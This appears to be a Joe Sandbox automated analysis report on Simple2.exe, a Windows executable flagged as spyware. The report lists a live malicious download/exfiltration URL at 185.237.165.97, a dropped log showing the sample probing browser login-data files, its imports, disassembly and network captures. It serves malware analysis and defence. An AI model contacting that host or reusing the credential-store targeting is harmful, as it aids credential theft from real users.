            http://185.237.165.97/userdataSimple2.exe, 00000000.00000003.2094063431.0000022EA02F3000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2094362886.0000022EA02D5000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000002.2360334802.0000022EA02F3000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000002.2360234153.0000022EA02D5000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2094263293.0000022EA02EE000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2094263293.0000022EA02F3000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            185.237.165.97
            unknownFrance
            52195AP-MEDIA-ASPLfalse
            104.26.12.205
            api.ipify.orgUnited States
            13335CLOUDFLARENETUSfalse
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1569894
            Start date and time:2024-12-06 11:14:18 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 5m 10s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Run name:Run with higher sleep bypass
            Number of analysed new started processes analysed:5
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:Simple2.exe
            Detection:MAL
            Classification:mal68.spyw.winEXE@2/1@1/2
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 27
            • Number of non-executed functions: 21
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtReadVirtualMemory calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • VT rate limit hit for: Simple2.exe
            No simulations
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            185.237.165.97systemConfigChecker.exeGet hashmaliciousUnknownBrowse
            • 185.237.165.97/userdata
            systemConfigChecker.exeGet hashmaliciousUnknownBrowse
            • 185.237.165.97/userdata
            104.26.12.205Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
            • api.ipify.org/
            Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
            • api.ipify.org/
            6706e721f2c06.exeGet hashmaliciousRemcosBrowse
            • api.ipify.org/
            perfcc.elfGet hashmaliciousXmrigBrowse
            • api.ipify.org/
            SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
            • api.ipify.org/
            SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
            • api.ipify.org/
            hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
            • api.ipify.org/
            file.exeGet hashmaliciousRDPWrap ToolBrowse
            • api.ipify.org/
            file.exeGet hashmaliciousUnknownBrowse
            • api.ipify.org/
            file.exeGet hashmaliciousUnknownBrowse
            • api.ipify.org/
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            api.ipify.orgsystemConfigChecker.exeGet hashmaliciousUnknownBrowse
            • 172.67.74.152
            systemConfigChecker.exeGet hashmaliciousUnknownBrowse
            • 172.67.74.152
            kYGxoN4JVW.batGet hashmaliciousUnknownBrowse
            • 172.67.74.152
            REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.13.205
            PO54782322024.exeGet hashmaliciousAgentTeslaBrowse
            • 172.67.74.152
            https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2ddGet hashmaliciousEvilProxy, HTMLPhisherBrowse
            • 104.26.13.205
            https://url.us.m.mimecastprotect.com/s/tWC_CNkXmJcoqkvlsmfBIyQP6j?domain=assets-gbr.mkt.dynamics.comGet hashmaliciousEvilProxy, HTMLPhisherBrowse
            • 104.26.13.205
            lC7L7oBBMC.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.13.205
            0wxckB4Iba.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 172.67.74.152
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            CLOUDFLARENETUSsystemConfigChecker.exeGet hashmaliciousUnknownBrowse
            • 172.67.74.152
            systemConfigChecker.exeGet hashmaliciousUnknownBrowse
            • 172.67.74.152
            file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
            • 172.67.165.166
            5q1Wm5VlqL.exeGet hashmaliciousNetSupport RATBrowse
            • 104.26.1.231
            2LKVPFub8Z.exeGet hashmaliciousSnake KeyloggerBrowse
            • 104.21.67.152
            file.exeGet hashmaliciousLummaC StealerBrowse
            • 104.21.16.9
            7fE6IkvYWf.exeGet hashmaliciousUnknownBrowse
            • 104.16.184.241
            kYGxoN4JVW.batGet hashmaliciousUnknownBrowse
            • 172.67.74.152
            datXObAAn1.exeGet hashmaliciousDiscord RatBrowse
            • 162.159.133.234
            AP-MEDIA-ASPLsystemConfigChecker.exeGet hashmaliciousUnknownBrowse
            • 185.237.165.97
            systemConfigChecker.exeGet hashmaliciousUnknownBrowse
            • 185.237.165.97
            x86.elfGet hashmaliciousMirai, MoobotBrowse
            • 46.149.221.180
            file.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
            • 185.237.165.180
            pjczQr2H3P.exeGet hashmaliciousSocks5SystemzBrowse
            • 185.237.165.53
            9TSh73ulR1.exeGet hashmaliciousSocks5SystemzBrowse
            • 185.237.165.53
            0o37tv6BhU.elfGet hashmaliciousMiraiBrowse
            • 46.149.221.189
            YZfB2vyTrR.elfGet hashmaliciousMiraiBrowse
            • 46.149.221.169
            pSWP8vqTi4.elfGet hashmaliciousMirai, MoobotBrowse
            • 46.149.221.178
            No context
            No context
            Process:C:\Users\user\Desktop\Simple2.exe
            File Type:ISO-8859 text, with CRLF line terminators
            Category:dropped
            Size (bytes):990
            Entropy (8bit):4.935198616893804
            Encrypted:false
            SSDEEP:24:8E5Kk89K5K889KM89LYeb89KDWD89MLFpLK+89r9H+3VS:8EUksKU8sKMsLDbsKDWDsgFdK+sF+3Y
            MD5:E157EC9E6FCE9A0736A2CE51D2EA6C8F
            SHA1:60BC99F049D030E39C0BF24F98CA229103BC738A
            SHA-256:19A2D767BDC19B9BEEF8CE463D8E47D18EB3DDBFE7851F6BDD1F7F9592D69181
            SHA-512:01208467C11D95407D9F36716CE10B915D3AE854A9E56BD3EFB68641034E637EFAA7E10648638686173D16C5FAD4090286127FFC732D9BAFE45210A6D65AACE0
            Malicious:false
            Reputation:low
            Preview:File is found: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Local\Google\Chrome Beta\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data..File is found: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data..File not found: C:\Users\user\AppData\Roaming\Opera Software\Opera GX Stable\Login Data..File not found: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data..File not found: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json..File is found: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\times.json.... ....... ........ ..... .. ..........
            File type:PE32+ executable (console) x86-64, for MS Windows
            Entropy (8bit):5.944817639384687
            TrID:
            • Win64 Executable Console (202006/5) 92.65%
            • Win64 Executable (generic) (12005/4) 5.51%
            • Generic Win/DOS Executable (2004/3) 0.92%
            • DOS Executable Generic (2002/1) 0.92%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:Simple2.exe
            File size:79'872 bytes
            MD5:ed207427a25863f5524d616525943dd5
            SHA1:6b7aa5224f76b8e09d3a8eefdb299e16b37c887f
            SHA256:418b88c4cd03e7da38287324094b5af3843835d63e06fd44c0fb06903d7575b6
            SHA512:ee55d29e1a8aab196406767b84812fa428c064af8cb692b4e01a5b69ebf95462cd965e42a0d7c6ed95542e130da8fec9c25188aab84a353492f07977264ceac9
            SSDEEP:1536:SsN2HJVypWjCoZQcAkX8Uet4WTjs/U9w:rN2HDypWjCMekXBet4WPwMw
            TLSH:81734B47279904ECD2BBE37CD29A5A02D376BC05132697CF039191362FA67D0AE7EB11
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A..v/..v/..v/......v/...+..v/...,..v/...*..v/......v/......v/..v.."v/...&..v/......v/...-..v/.Rich.v/.........PE..d...h..f...
            Icon Hash:00928e8e8686b000
            Entrypoint:0x14000b768
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x140000000
            Subsystem:windows cui
            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Time Stamp:0x66F2E668 [Tue Sep 24 16:18:48 2024 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:6
            OS Version Minor:0
            File Version Major:6
            File Version Minor:0
            Subsystem Version Major:6
            Subsystem Version Minor:0
            Import Hash:066fb96ba163200488bf8cbd9705163e
            Instruction
            dec eax
            sub esp, 28h
            call 00007FB1A4C350B0h
            dec eax
            add esp, 28h
            jmp 00007FB1A4C34977h
            int3
            int3
            retn 0000h
            int3
            inc eax
            push ebx
            dec eax
            sub esp, 20h
            dec eax
            mov ebx, ecx
            xor ecx, ecx
            call dword ptr [0000194Fh]
            dec eax
            mov ecx, ebx
            call dword ptr [0000193Eh]
            call dword ptr [00001948h]
            dec eax
            mov ecx, eax
            mov edx, C0000409h
            dec eax
            add esp, 20h
            pop ebx
            dec eax
            jmp dword ptr [0000193Ch]
            dec eax
            mov dword ptr [esp+08h], ecx
            dec eax
            sub esp, 38h
            mov ecx, 00000017h
            call dword ptr [00001930h]
            test eax, eax
            je 00007FB1A4C34B09h
            mov ecx, 00000002h
            int 29h
            dec eax
            lea ecx, dword ptr [000090A6h]
            call 00007FB1A4C34BAEh
            dec eax
            mov eax, dword ptr [esp+38h]
            dec eax
            mov dword ptr [0000918Dh], eax
            dec eax
            lea eax, dword ptr [esp+38h]
            dec eax
            add eax, 08h
            dec eax
            mov dword ptr [0000911Dh], eax
            dec eax
            mov eax, dword ptr [00009176h]
            dec eax
            mov dword ptr [00008FE7h], eax
            dec eax
            mov eax, dword ptr [esp+40h]
            dec eax
            mov dword ptr [000090EBh], eax
            mov dword ptr [00008FC1h], C0000409h
            mov dword ptr [00008FBBh], 00000001h
            mov dword ptr [00008FC5h], 00000001h
            Programming Language:
            • [IMP] VS2008 SP1 build 30729
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x10dbc0x154.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x1e0.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x150000x948.pdata
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x170000x10c.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0xe7c00x70.rdata
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xe6800x140.rdata
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0xd0000x630.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000xba070xbc009b0eebbbfa76824e01521c9aec7dfe57False0.4793675199468085zlib compressed data6.10415307318274IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0xd0000x61280x6200f96793aa05943a27e75f5c0f81ce41a1False0.3508450255102041data4.9758094084428075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0x140000xda00x800a1584494173fef381407b0a55fe58cdfFalse0.197265625DOS executable (block device driver)3.6123807981210243IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .pdata0x150000x9480xa0056d1a1fb2414222ac35eeeae290fd52eFalse0.46796875data4.4815576012306435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .rsrc0x160000x1e00x200c970c10a1e848ee974b87923ecbe6a2fFalse0.525390625data4.706155132693063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0x170000x10c0x200229d40605aa4496585f934aa5d939a3aFalse0.421875data3.2433320779278194IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_MANIFEST0x160600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
            DLLImport
            KERNEL32.dllGetFileAttributesW, GetLocaleInfoA, OpenProcess, GetTimeZoneInformation, GetLastError, CloseHandle, K32GetModuleBaseNameA, GetSystemInfo, K32EnumProcesses, GlobalMemoryStatusEx, GetConsoleWindow, K32EnumProcessModules, GetDiskFreeSpaceExA, FindClose, InitializeSListHead, GetSystemTimeAsFileTime, GetEnvironmentVariableW, FindNextFileW, FindFirstFileW, GetLogicalDrives, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, RtlLookupFunctionEntry, GetModuleFileNameA, GetCurrentThreadId, RtlCaptureContext
            USER32.dllShowWindow
            ADVAPI32.dllRegGetValueA, RegCloseKey, RegOpenKeyExA
            MSVCP140.dll?id@?$codecvt@_WDU_Mbstatet@@@std@@2V0locale@2@A, ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ, ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ?sputn@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAA_JPEB_W_J@Z, ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z, ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD@Z, ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z, ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W@Z, ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ, ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z, ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z, ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD@Z, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXPEAPEAD0PEAH001@Z, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z, ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD@Z, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?_Lock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ, ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JXZ, ?uflow@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAHXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J@Z, ?setbuf@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAPEAV12@PEAD_J@Z, ?sync@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAHXZ, ?imbue@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAXAEBVlocale@2@@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z, ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z, ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z, ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ, ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?good@ios_base@std@@QEBA_NXZ, ??7ios_base@std@@QEBA_NXZ, ??1?$codecvt@_WDU_Mbstatet@@@std@@MEAA@XZ, ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K@Z, ?out@?$codecvt@_WDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEB_W1AEAPEB_WPEAD3AEAPEAD@Z, ?in@?$codecvt@_WDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEA_W3AEAPEA_W@Z, ?always_noconv@codecvt_base@std@@QEBA_NXZ, ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K@Z, ?_Decref@facet@locale@std@@UEAAPEAV_Facet_base@3@XZ, ?_Incref@facet@locale@std@@UEAAXXZ, ??Bid@locale@std@@QEAA_KXZ, ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z, ?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A, ?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A, ?uncaught_exception@std@@YA_NXZ, ?_Init@locale@std@@CAPEAV_Locimp@12@_N@Z, ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ, ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@@Z, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ??0_Lockit@std@@QEAA@H@Z, ??1_Lockit@std@@QEAA@XZ, ?_Xlength_error@std@@YAXPEBD@Z
            IPHLPAPI.DLLGetAdaptersInfo
            NETAPI32.dllNetApiBufferFree, NetUserEnum, NetGetJoinInformation
            WINHTTP.dllWinHttpQueryDataAvailable, WinHttpConnect, WinHttpSendRequest, WinHttpCloseHandle, WinHttpOpenRequest, WinHttpReadData, WinHttpQueryHeaders, WinHttpOpen, WinHttpReceiveResponse
            VCRUNTIME140_1.dll__CxxFrameHandler4
            VCRUNTIME140.dll__C_specific_handler, _CxxThrowException, memset, __current_exception, __std_terminate, __std_exception_copy, memcpy, memcmp, memchr, memmove, __current_exception_context, __std_exception_destroy
            api-ms-win-crt-stdio-l1-1-0.dllfread, fsetpos, ungetc, _fseeki64, _get_stream_buffer_pointers, setvbuf, fgetpos, fwrite, fflush, __p__commode, fputc, fgetc, fclose, _set_fmode
            api-ms-win-crt-heap-l1-1-0.dllfree, malloc, _set_new_mode, _callnewh
            api-ms-win-crt-string-l1-1-0.dllisalnum
            api-ms-win-crt-filesystem-l1-1-0.dll_lock_file, _unlock_file
            api-ms-win-crt-runtime-l1-1-0.dll_get_initial_narrow_environment, _initterm, _initterm_e, _cexit, _exit, __p___argc, __p___argv, _c_exit, _register_thread_local_exe_atexit_callback, _crt_atexit, _register_onexit_function, _seh_filter_exe, _initialize_onexit_table, _initialize_narrow_environment, _configure_narrow_argv, _set_app_type, exit, terminate, _invalid_parameter_noinfo_noreturn
            api-ms-win-crt-math-l1-1-0.dll__setusermatherr
            api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States
            TimestampSource PortDest PortSource IPDest IP
            Dec 6, 2024 11:15:10.013108969 CET4970480192.168.2.5104.26.12.205
            Dec 6, 2024 11:15:10.132997036 CET8049704104.26.12.205192.168.2.5
            Dec 6, 2024 11:15:10.133088112 CET4970480192.168.2.5104.26.12.205
            Dec 6, 2024 11:15:10.133362055 CET4970480192.168.2.5104.26.12.205
            Dec 6, 2024 11:15:10.253019094 CET8049704104.26.12.205192.168.2.5
            Dec 6, 2024 11:15:11.248678923 CET8049704104.26.12.205192.168.2.5
            Dec 6, 2024 11:15:11.295167923 CET4970480192.168.2.5104.26.12.205
            Dec 6, 2024 11:15:11.902643919 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:15:12.022711992 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:12.022876024 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:15:12.023067951 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:15:12.023189068 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:15:12.143224001 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:12.143285990 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:15:12.143379927 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:12.143388033 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:12.143399000 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:12.143428087 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:12.143451929 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:15:12.143469095 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:12.143484116 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:15:12.143500090 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:15:12.143527985 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:15:12.143681049 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:12.143692970 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:12.143752098 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:15:12.143807888 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:12.143819094 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:12.143873930 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:15:12.263375044 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:12.263405085 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:12.263427973 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:12.263437033 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:12.263459921 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:12.263478041 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:12.263560057 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:15:12.304400921 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:12.304590940 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:15:12.424523115 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:12.424634933 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:15:12.468523979 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:12.588423014 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:12.588629007 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:15:12.796613932 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:12.796741009 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:15:13.048511028 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:13.048595905 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:15:13.296626091 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:13.296710968 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:15:13.548397064 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:13.548537970 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:15:13.792480946 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:13.792666912 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:15:14.040472031 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:14.040672064 CET4970580192.168.2.5185.237.165.97
            Dec 6, 2024 11:15:14.171266079 CET8049705185.237.165.97192.168.2.5
            Dec 6, 2024 11:15:41.356002092 CET4970480192.168.2.5104.26.12.205
            TimestampSource PortDest PortSource IPDest IP
            Dec 6, 2024 11:15:09.805402040 CET5824953192.168.2.51.1.1.1
            Dec 6, 2024 11:15:10.006465912 CET53582491.1.1.1192.168.2.5
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Dec 6, 2024 11:15:09.805402040 CET192.168.2.51.1.1.10xeaf9Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Dec 6, 2024 11:15:10.006465912 CET1.1.1.1192.168.2.50xeaf9No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
            Dec 6, 2024 11:15:10.006465912 CET1.1.1.1192.168.2.50xeaf9No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
            Dec 6, 2024 11:15:10.006465912 CET1.1.1.1192.168.2.50xeaf9No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
            • api.ipify.org
            • 185.237.165.97
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
